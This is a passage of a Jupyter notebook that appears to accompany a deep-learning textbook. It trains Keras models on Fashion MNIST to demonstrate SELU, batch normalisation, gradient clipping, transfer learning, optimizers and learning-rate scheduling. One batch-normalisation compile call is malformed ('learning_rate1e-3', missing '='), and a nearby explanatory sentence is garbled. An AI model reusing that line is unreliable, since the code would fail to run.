Using this activation function, even a 1,000 layer deep neural network preserves roughly mean 0 and standard deviation 1 across all layers, avoiding the exploding/vanishing gradients problem:", "_____no_output_____" ] ], [ [ "np.random.seed(42)\nZ = np.random.normal(size=(500, 100)) # standardized inputs\nfor layer in range(1000):\n W = np.random.normal(size=(100, 100), scale=np.sqrt(1 / 100)) # LeCun initialization\n Z = selu(np.dot(Z, W))\n means = np.mean(Z, axis=0).mean()\n stds = np.std(Z, axis=0).mean()\n if layer % 100 == 0:\n print(\"Layer {}: mean {:.2f}, std deviation {:.2f}\".format(layer, means, stds))", "Layer 0: mean -0.00, std deviation 1.00\nLayer 100: mean 0.02, std deviation 0.96\nLayer 200: mean 0.01, std deviation 0.90\nLayer 300: mean -0.02, std deviation 0.92\nLayer 400: mean 0.05, std deviation 0.89\nLayer 500: mean 0.01, std deviation 0.93\nLayer 600: mean 0.02, std deviation 0.92\nLayer 700: mean -0.02, std deviation 0.90\nLayer 800: mean 0.05, std deviation 0.83\nLayer 900: mean 0.02, std deviation 1.00\n" ] ], [ [ "Using SELU is easy:", "_____no_output_____" ] ], [ [ "keras.layers.Dense(10, activation=\"selu\",\n kernel_initializer=\"lecun_normal\")", "_____no_output_____" ] ], [ [ "Let's create a neural net for Fashion MNIST with 100 hidden layers, using the SELU activation function:", "_____no_output_____" ] ], [ [ "np.random.seed(42)\ntf.random.set_seed(42)", "_____no_output_____" ], [ "model = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[28, 28]))\nmodel.add(keras.layers.Dense(300, activation=\"selu\",\n kernel_initializer=\"lecun_normal\"))\nfor layer in range(99):\n model.add(keras.layers.Dense(100, activation=\"selu\",\n kernel_initializer=\"lecun_normal\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ] 
], [ [ "Now let's train it. Do not forget to scale the inputs to mean 0 and standard deviation 1:", "_____no_output_____" ] ], [ [ "pixel_means = X_train.mean(axis=0, keepdims=True)\npixel_stds = X_train.std(axis=0, keepdims=True)\nX_train_scaled = (X_train - pixel_means) / pixel_stds\nX_valid_scaled = (X_valid - pixel_means) / pixel_stds\nX_test_scaled = (X_test - pixel_means) / pixel_stds", "_____no_output_____" ], [ "history = model.fit(X_train_scaled, y_train, epochs=5,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/5\n1719/1719 [==============================] - 12s 6ms/step - loss: 1.3556 - accuracy: 0.4808 - val_loss: 0.7711 - val_accuracy: 0.6858\nEpoch 2/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.7537 - accuracy: 0.7235 - val_loss: 0.7534 - val_accuracy: 0.7384\nEpoch 3/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.7451 - accuracy: 0.7357 - val_loss: 0.5943 - val_accuracy: 0.7834\nEpoch 4/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.5699 - accuracy: 0.7906 - val_loss: 0.5434 - val_accuracy: 0.8066\nEpoch 5/5\n1719/1719 [==============================] - 9s 5ms/step - loss: 0.5569 - accuracy: 0.8051 - val_loss: 0.4907 - val_accuracy: 0.8218\n" ] ], [ [ "Now look at what happens if we try to use the ReLU activation function instead:", "_____no_output_____" ] ], [ [ "np.random.seed(42)\ntf.random.set_seed(42)", "_____no_output_____" ], [ "model = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[28, 28]))\nmodel.add(keras.layers.Dense(300, activation=\"relu\", kernel_initializer=\"he_normal\"))\nfor layer in range(99):\n model.add(keras.layers.Dense(100, activation=\"relu\", kernel_initializer=\"he_normal\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" 
], [ "history = model.fit(X_train_scaled, y_train, epochs=5,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/5\n1719/1719 [==============================] - 11s 5ms/step - loss: 2.0460 - accuracy: 0.1919 - val_loss: 1.5971 - val_accuracy: 0.3048\nEpoch 2/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 1.2654 - accuracy: 0.4591 - val_loss: 0.9156 - val_accuracy: 0.6372\nEpoch 3/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 0.9312 - accuracy: 0.6169 - val_loss: 0.8928 - val_accuracy: 0.6246\nEpoch 4/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 0.8188 - accuracy: 0.6710 - val_loss: 0.6914 - val_accuracy: 0.7396\nEpoch 5/5\n1719/1719 [==============================] - 8s 5ms/step - loss: 0.7288 - accuracy: 0.7152 - val_loss: 0.6638 - val_accuracy: 0.7380\n" ] ], [ [ "Not great at all, we suffered from the vanishing/exploding gradients problem.", "_____no_output_____" ], [ "# Batch Normalization", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(300, activation=\"relu\"),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(100, activation=\"relu\"),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.summary()", "Model: \"sequential_4\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nflatten_4 (Flatten) (None, 784) 0 \n_________________________________________________________________\nbatch_normalization (BatchNo (None, 784) 3136 \n_________________________________________________________________\ndense_212 (Dense) (None, 300) 235500 \n_________________________________________________________________\nbatch_normalization_1 (Batch (None, 300) 1200 
\n_________________________________________________________________\ndense_213 (Dense) (None, 100) 30100 \n_________________________________________________________________\nbatch_normalization_2 (Batch (None, 100) 400 \n_________________________________________________________________\ndense_214 (Dense) (None, 10) 1010 \n=================================================================\nTotal params: 271,346\nTrainable params: 268,978\nNon-trainable params: 2,368\n_________________________________________________________________\n" ], [ "bn1 = model.layers[1]\n[(var.name, var.trainable) for var in bn1.variables]", "_____no_output_____" ], [ "#bn1.updates #deprecated", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 1/10\n1719/1719 [==============================] - 3s 1ms/step - loss: 1.2287 - accuracy: 0.5993 - val_loss: 0.5526 - val_accuracy: 0.8230\nEpoch 2/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5996 - accuracy: 0.7959 - val_loss: 0.4725 - val_accuracy: 0.8468\nEpoch 3/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5312 - accuracy: 0.8168 - val_loss: 0.4375 - val_accuracy: 0.8558\nEpoch 4/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4884 - accuracy: 0.8294 - val_loss: 0.4153 - val_accuracy: 0.8596\nEpoch 5/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4717 - accuracy: 0.8343 - val_loss: 0.3997 - val_accuracy: 0.8640\nEpoch 6/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4420 - accuracy: 0.8461 - val_loss: 0.3867 - val_accuracy: 0.8694\nEpoch 7/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4285 - accuracy: 0.8496 - val_loss: 0.3763 - val_accuracy: 0.8710\nEpoch 
8/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4086 - accuracy: 0.8552 - val_loss: 0.3711 - val_accuracy: 0.8740\nEpoch 9/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4079 - accuracy: 0.8566 - val_loss: 0.3631 - val_accuracy: 0.8752\nEpoch 10/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3903 - accuracy: 0.8617 - val_loss: 0.3573 - val_accuracy: 0.8750\n" ] ], [ [ "Sometimes applying BN before the activation function works better (there's a debate on this topic). Moreover, the layer before a `BatchNormalization` layer does not need to have bias terms, since the `BatchNormalization` layer some as well, it would be a waste of parameters, so you can set `use_bias=False` when creating those layers:", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(300, use_bias=False),\n keras.layers.BatchNormalization(),\n keras.layers.Activation(\"relu\"),\n keras.layers.Dense(100, use_bias=False),\n keras.layers.BatchNormalization(),\n keras.layers.Activation(\"relu\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])", "_____no_output_____" ], [ "model.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model.fit(X_train, y_train, epochs=10,\n validation_data=(X_valid, y_valid))", "Epoch 1/10\n1719/1719 [==============================] - 3s 1ms/step - loss: 1.3677 - accuracy: 0.5604 - val_loss: 0.6767 - val_accuracy: 0.7812\nEpoch 2/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.7136 - accuracy: 0.7702 - val_loss: 0.5566 - val_accuracy: 0.8184\nEpoch 3/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.6123 - accuracy: 0.7990 - val_loss: 0.5007 - val_accuracy: 0.8360\nEpoch 4/10\n1719/1719 [==============================] - 
2s 1ms/step - loss: 0.5547 - accuracy: 0.8148 - val_loss: 0.4666 - val_accuracy: 0.8448\nEpoch 5/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5255 - accuracy: 0.8230 - val_loss: 0.4434 - val_accuracy: 0.8534\nEpoch 6/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4947 - accuracy: 0.8328 - val_loss: 0.4263 - val_accuracy: 0.8550\nEpoch 7/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4736 - accuracy: 0.8385 - val_loss: 0.4130 - val_accuracy: 0.8566\nEpoch 8/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4550 - accuracy: 0.8446 - val_loss: 0.4035 - val_accuracy: 0.8612\nEpoch 9/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4495 - accuracy: 0.8440 - val_loss: 0.3943 - val_accuracy: 0.8638\nEpoch 10/10\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4333 - accuracy: 0.8494 - val_loss: 0.3875 - val_accuracy: 0.8660\n" ] ], [ [ "## Gradient Clipping", "_____no_output_____" ], [ "All Keras optimizers accept `clipnorm` or `clipvalue` arguments:", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(clipvalue=1.0)", "_____no_output_____" ], [ "optimizer = keras.optimizers.SGD(clipnorm=1.0)", "_____no_output_____" ] ], [ [ "## Reusing Pretrained Layers", "_____no_output_____" ], [ "### Reusing a Keras model", "_____no_output_____" ], [ "Let's split the fashion MNIST training set in two:\n* `X_train_A`: all images of all items except for sandals and shirts (classes 5 and 6).\n* `X_train_B`: a much smaller training set of just the first 200 images of sandals or shirts.\n\nThe validation set and the test set are also split this way, but without restricting the number of images.\n\nWe will train a model on set A (classification task with 8 classes), and try to reuse it to tackle set B (binary classification). 
We hope to transfer a little bit of knowledge from task A to task B, since classes in set A (sneakers, ankle boots, coats, t-shirts, etc.) are somewhat similar to classes in set B (sandals and shirts). However, since we are using `Dense` layers, only patterns that occur at the same location can be reused (in contrast, convolutional layers will transfer much better, since learned patterns can be detected anywhere on the image, as we will see in the CNN chapter).", "_____no_output_____" ] ], [ [ "def split_dataset(X, y):\n y_5_or_6 = (y == 5) | (y == 6) # sandals or shirts\n y_A = y[~y_5_or_6]\n y_A[y_A > 6] -= 2 # class indices 7, 8, 9 should be moved to 5, 6, 7\n y_B = (y[y_5_or_6] == 6).astype(np.float32) # binary classification task: is it a shirt (class 6)?\n return ((X[~y_5_or_6], y_A),\n (X[y_5_or_6], y_B))\n\n(X_train_A, y_train_A), (X_train_B, y_train_B) = split_dataset(X_train, y_train)\n(X_valid_A, y_valid_A), (X_valid_B, y_valid_B) = split_dataset(X_valid, y_valid)\n(X_test_A, y_test_A), (X_test_B, y_test_B) = split_dataset(X_test, y_test)\nX_train_B = X_train_B[:200]\ny_train_B = y_train_B[:200]", "_____no_output_____" ], [ "X_train_A.shape", "_____no_output_____" ], [ "X_train_B.shape", "_____no_output_____" ], [ "y_train_A[:30]", "_____no_output_____" ], [ "y_train_B[:30]", "_____no_output_____" ], [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "model_A = keras.models.Sequential()\nmodel_A.add(keras.layers.Flatten(input_shape=[28, 28]))\nfor n_hidden in (300, 100, 50, 50, 50):\n model_A.add(keras.layers.Dense(n_hidden, activation=\"selu\"))\nmodel_A.add(keras.layers.Dense(8, activation=\"softmax\"))", "_____no_output_____" ], [ "model_A.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model_A.fit(X_train_A, y_train_A, epochs=20,\n validation_data=(X_valid_A, y_valid_A))", "Epoch 1/20\n1375/1375 
[==============================] - 2s 1ms/step - loss: 0.9249 - accuracy: 0.6994 - val_loss: 0.3896 - val_accuracy: 0.8662\nEpoch 2/20\n1375/1375 [==============================] - 2s 1ms/step - loss: 0.3651 - accuracy: 0.8745 - val_loss: 0.3288 - val_accuracy: 0.8827\nEpoch 3/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.3182 - accuracy: 0.8897 - val_loss: 0.3013 - val_accuracy: 0.8991\nEpoch 4/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.3048 - accuracy: 0.8954 - val_loss: 0.2896 - val_accuracy: 0.9021\nEpoch 5/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2804 - accuracy: 0.9029 - val_loss: 0.2773 - val_accuracy: 0.9061\nEpoch 6/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2701 - accuracy: 0.9075 - val_loss: 0.2735 - val_accuracy: 0.9066\nEpoch 7/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2627 - accuracy: 0.9093 - val_loss: 0.2721 - val_accuracy: 0.9081\nEpoch 8/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2609 - accuracy: 0.9122 - val_loss: 0.2589 - val_accuracy: 0.9141\nEpoch 9/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2558 - accuracy: 0.9110 - val_loss: 0.2562 - val_accuracy: 0.9136\nEpoch 10/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2512 - accuracy: 0.9138 - val_loss: 0.2544 - val_accuracy: 0.9160\nEpoch 11/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2431 - accuracy: 0.9170 - val_loss: 0.2495 - val_accuracy: 0.9153\nEpoch 12/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2422 - accuracy: 0.9168 - val_loss: 0.2515 - val_accuracy: 0.9126\nEpoch 13/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2360 - accuracy: 0.9181 - val_loss: 0.2446 - val_accuracy: 0.9160\nEpoch 14/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2266 - accuracy: 0.9232 - val_loss: 
0.2415 - val_accuracy: 0.9178\nEpoch 15/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2225 - accuracy: 0.9239 - val_loss: 0.2447 - val_accuracy: 0.9195\nEpoch 16/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2261 - accuracy: 0.9216 - val_loss: 0.2384 - val_accuracy: 0.9198\nEpoch 17/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2191 - accuracy: 0.9251 - val_loss: 0.2412 - val_accuracy: 0.9175\nEpoch 18/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2171 - accuracy: 0.9254 - val_loss: 0.2429 - val_accuracy: 0.9158\nEpoch 19/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2180 - accuracy: 0.9252 - val_loss: 0.2330 - val_accuracy: 0.9205\nEpoch 20/20\n1375/1375 [==============================] - 1s 1ms/step - loss: 0.2112 - accuracy: 0.9274 - val_loss: 0.2333 - val_accuracy: 0.9200\n" ], [ "model_A.save(\"my_model_A.h5\")", "_____no_output_____" ], [ "model_B = keras.models.Sequential()\nmodel_B.add(keras.layers.Flatten(input_shape=[28, 28]))\nfor n_hidden in (300, 100, 50, 50, 50):\n model_B.add(keras.layers.Dense(n_hidden, activation=\"selu\"))\nmodel_B.add(keras.layers.Dense(1, activation=\"sigmoid\"))", "_____no_output_____" ], [ "model_B.compile(loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "history = model_B.fit(X_train_B, y_train_B, epochs=20,\n validation_data=(X_valid_B, y_valid_B))", "Epoch 1/20\n7/7 [==============================] - 0s 30ms/step - loss: 1.0360 - accuracy: 0.4975 - val_loss: 0.6314 - val_accuracy: 0.6004\nEpoch 2/20\n7/7 [==============================] - 0s 9ms/step - loss: 0.5883 - accuracy: 0.6971 - val_loss: 0.4784 - val_accuracy: 0.8529\nEpoch 3/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.4380 - accuracy: 0.8854 - val_loss: 0.4102 - val_accuracy: 0.8945\nEpoch 4/20\n7/7 [==============================] 
- 0s 11ms/step - loss: 0.4021 - accuracy: 0.8712 - val_loss: 0.3647 - val_accuracy: 0.9178\nEpoch 5/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.3361 - accuracy: 0.9348 - val_loss: 0.3300 - val_accuracy: 0.9320\nEpoch 6/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.3113 - accuracy: 0.9233 - val_loss: 0.3019 - val_accuracy: 0.9402\nEpoch 7/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2817 - accuracy: 0.9299 - val_loss: 0.2804 - val_accuracy: 0.9422\nEpoch 8/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2632 - accuracy: 0.9379 - val_loss: 0.2606 - val_accuracy: 0.9473\nEpoch 9/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2373 - accuracy: 0.9481 - val_loss: 0.2428 - val_accuracy: 0.9523\nEpoch 10/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2229 - accuracy: 0.9657 - val_loss: 0.2281 - val_accuracy: 0.9544\nEpoch 11/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.2155 - accuracy: 0.9590 - val_loss: 0.2150 - val_accuracy: 0.9584\nEpoch 12/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.1834 - accuracy: 0.9738 - val_loss: 0.2036 - val_accuracy: 0.9584\nEpoch 13/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1671 - accuracy: 0.9828 - val_loss: 0.1931 - val_accuracy: 0.9615\nEpoch 14/20\n7/7 [==============================] - 0s 11ms/step - loss: 0.1527 - accuracy: 0.9915 - val_loss: 0.1838 - val_accuracy: 0.9635\nEpoch 15/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1595 - accuracy: 0.9904 - val_loss: 0.1746 - val_accuracy: 0.9686\nEpoch 16/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1473 - accuracy: 0.9937 - val_loss: 0.1674 - val_accuracy: 0.9686\nEpoch 17/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1412 - accuracy: 0.9944 - val_loss: 0.1604 - val_accuracy: 0.9706\nEpoch 18/20\n7/7 [==============================] - 0s 10ms/step - 
loss: 0.1242 - accuracy: 0.9931 - val_loss: 0.1539 - val_accuracy: 0.9706\nEpoch 19/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1224 - accuracy: 0.9931 - val_loss: 0.1482 - val_accuracy: 0.9716\nEpoch 20/20\n7/7 [==============================] - 0s 10ms/step - loss: 0.1096 - accuracy: 0.9912 - val_loss: 0.1431 - val_accuracy: 0.9716\n" ], [ "model_B.summary()", "Model: \"sequential_7\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nflatten_7 (Flatten) (None, 784) 0 \n_________________________________________________________________\ndense_224 (Dense) (None, 300) 235500 \n_________________________________________________________________\ndense_225 (Dense) (None, 100) 30100 \n_________________________________________________________________\ndense_226 (Dense) (None, 50) 5050 \n_________________________________________________________________\ndense_227 (Dense) (None, 50) 2550 \n_________________________________________________________________\ndense_228 (Dense) (None, 50) 2550 \n_________________________________________________________________\ndense_229 (Dense) (None, 1) 51 \n=================================================================\nTotal params: 275,801\nTrainable params: 275,801\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "model_A = keras.models.load_model(\"my_model_A.h5\")\nmodel_B_on_A = keras.models.Sequential(model_A.layers[:-1])\nmodel_B_on_A.add(keras.layers.Dense(1, activation=\"sigmoid\"))", "_____no_output_____" ], [ "model_A_clone = keras.models.clone_model(model_A)\nmodel_A_clone.set_weights(model_A.get_weights())", "_____no_output_____" ], [ "for layer in model_B_on_A.layers[:-1]:\n layer.trainable = False\n\nmodel_B_on_A.compile(loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", 
"_____no_output_____" ], [ "history = model_B_on_A.fit(X_train_B, y_train_B, epochs=4,\n validation_data=(X_valid_B, y_valid_B))\n\nfor layer in model_B_on_A.layers[:-1]:\n layer.trainable = True\n\nmodel_B_on_A.compile(loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])\nhistory = model_B_on_A.fit(X_train_B, y_train_B, epochs=16,\n validation_data=(X_valid_B, y_valid_B))", "Epoch 1/4\n7/7 [==============================] - 1s 83ms/step - loss: 0.6155 - accuracy: 0.6184 - val_loss: 0.5843 - val_accuracy: 0.6329\nEpoch 2/4\n7/7 [==============================] - 0s 9ms/step - loss: 0.5550 - accuracy: 0.6638 - val_loss: 0.5467 - val_accuracy: 0.6805\nEpoch 3/4\n7/7 [==============================] - 0s 8ms/step - loss: 0.4897 - accuracy: 0.7482 - val_loss: 0.5146 - val_accuracy: 0.7089\nEpoch 4/4\n7/7 [==============================] - 0s 8ms/step - loss: 0.4899 - accuracy: 0.7405 - val_loss: 0.4859 - val_accuracy: 0.7323\nEpoch 1/16\n7/7 [==============================] - 0s 28ms/step - loss: 0.4380 - accuracy: 0.7774 - val_loss: 0.3460 - val_accuracy: 0.8661\nEpoch 2/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.2971 - accuracy: 0.9143 - val_loss: 0.2603 - val_accuracy: 0.9310\nEpoch 3/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.2034 - accuracy: 0.9777 - val_loss: 0.2110 - val_accuracy: 0.9554\nEpoch 4/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1754 - accuracy: 0.9719 - val_loss: 0.1790 - val_accuracy: 0.9696\nEpoch 5/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1348 - accuracy: 0.9809 - val_loss: 0.1561 - val_accuracy: 0.9757\nEpoch 6/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1172 - accuracy: 0.9973 - val_loss: 0.1392 - val_accuracy: 0.9797\nEpoch 7/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.1137 - accuracy: 0.9931 - val_loss: 0.1266 - val_accuracy: 0.9838\nEpoch 8/16\n7/7 
[==============================] - 0s 9ms/step - loss: 0.1000 - accuracy: 0.9931 - val_loss: 0.1163 - val_accuracy: 0.9858\nEpoch 9/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0834 - accuracy: 1.0000 - val_loss: 0.1065 - val_accuracy: 0.9888\nEpoch 10/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0775 - accuracy: 1.0000 - val_loss: 0.0999 - val_accuracy: 0.9899\nEpoch 11/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0689 - accuracy: 1.0000 - val_loss: 0.0939 - val_accuracy: 0.9899\nEpoch 12/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0719 - accuracy: 1.0000 - val_loss: 0.0888 - val_accuracy: 0.9899\nEpoch 13/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0565 - accuracy: 1.0000 - val_loss: 0.0839 - val_accuracy: 0.9899\nEpoch 14/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0494 - accuracy: 1.0000 - val_loss: 0.0802 - val_accuracy: 0.9899\nEpoch 15/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0544 - accuracy: 1.0000 - val_loss: 0.0768 - val_accuracy: 0.9899\nEpoch 16/16\n7/7 [==============================] - 0s 9ms/step - loss: 0.0472 - accuracy: 1.0000 - val_loss: 0.0738 - val_accuracy: 0.9899\n" ] ], [ [ "So, what's the final verdict?", "_____no_output_____" ] ], [ [ "model_B.evaluate(X_test_B, y_test_B)", "63/63 [==============================] - 0s 723us/step - loss: 0.1408 - accuracy: 0.9705\n" ], [ "model_B_on_A.evaluate(X_test_B, y_test_B)", "63/63 [==============================] - 0s 705us/step - loss: 0.0682 - accuracy: 0.9935\n" ] ], [ [ "Great! 
We got quite a bit of transfer: the error rate dropped by a factor of 4.5!", "_____no_output_____" ] ], [ [ "(100 - 97.05) / (100 - 99.35)", "_____no_output_____" ] ], [ [ "# Faster Optimizers", "_____no_output_____" ], [ "## Momentum optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(learning_rate=0.001, momentum=0.9)", "_____no_output_____" ] ], [ [ "## Nesterov Accelerated Gradient", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(learning_rate=0.001, momentum=0.9, nesterov=True)", "_____no_output_____" ] ], [ [ "## AdaGrad", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Adagrad(learning_rate=0.001)", "_____no_output_____" ] ], [ [ "## RMSProp", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.RMSprop(learning_rate=0.001, rho=0.9)", "_____no_output_____" ] ], [ [ "## Adam Optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999)", "_____no_output_____" ] ], [ [ "## Adamax Optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Adamax(learning_rate=0.001, beta_1=0.9, beta_2=0.999)", "_____no_output_____" ] ], [ [ "## Nadam Optimization", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Nadam(learning_rate=0.001, beta_1=0.9, beta_2=0.999)", "_____no_output_____" ] ], [ [ "## Learning Rate Scheduling", "_____no_output_____" ], [ "### Power Scheduling", "_____no_output_____" ], [ "```lr = lr0 / (1 + steps / s)**c```\n* Keras uses `c=1` and `s = 1 / decay`", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.SGD(learning_rate=0.01, decay=1e-4)", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, 
activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])", "_____no_output_____" ], [ "n_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5980 - accuracy: 0.7933 - val_loss: 0.4031 - val_accuracy: 0.8598\nEpoch 2/25\n1719/1719 [==============================] - 2s 954us/step - loss: 0.3829 - accuracy: 0.8636 - val_loss: 0.3714 - val_accuracy: 0.8720\nEpoch 3/25\n1719/1719 [==============================] - 2s 943us/step - loss: 0.3491 - accuracy: 0.8771 - val_loss: 0.3746 - val_accuracy: 0.8738\nEpoch 4/25\n1719/1719 [==============================] - 2s 954us/step - loss: 0.3277 - accuracy: 0.8814 - val_loss: 0.3502 - val_accuracy: 0.8798\nEpoch 5/25\n1719/1719 [==============================] - 2s 934us/step - loss: 0.3172 - accuracy: 0.8856 - val_loss: 0.3453 - val_accuracy: 0.8780\nEpoch 6/25\n1719/1719 [==============================] - 2s 919us/step - loss: 0.2922 - accuracy: 0.8940 - val_loss: 0.3419 - val_accuracy: 0.8820\nEpoch 7/25\n1719/1719 [==============================] - 2s 921us/step - loss: 0.2870 - accuracy: 0.8973 - val_loss: 0.3362 - val_accuracy: 0.8872\nEpoch 8/25\n1719/1719 [==============================] - 2s 925us/step - loss: 0.2720 - accuracy: 0.9032 - val_loss: 0.3415 - val_accuracy: 0.8830\nEpoch 9/25\n1719/1719 [==============================] - 2s 929us/step - loss: 0.2730 - accuracy: 0.9004 - val_loss: 0.3297 - val_accuracy: 0.8864\nEpoch 10/25\n1719/1719 [==============================] - 2s 928us/step - loss: 0.2585 - accuracy: 0.9068 - val_loss: 0.3269 - val_accuracy: 0.8888\nEpoch 11/25\n1719/1719 [==============================] - 2s 932us/step - loss: 0.2529 - accuracy: 0.9100 - val_loss: 0.3280 - val_accuracy: 0.8878\nEpoch 12/25\n1719/1719 [==============================] - 2s 954us/step - loss: 0.2485 
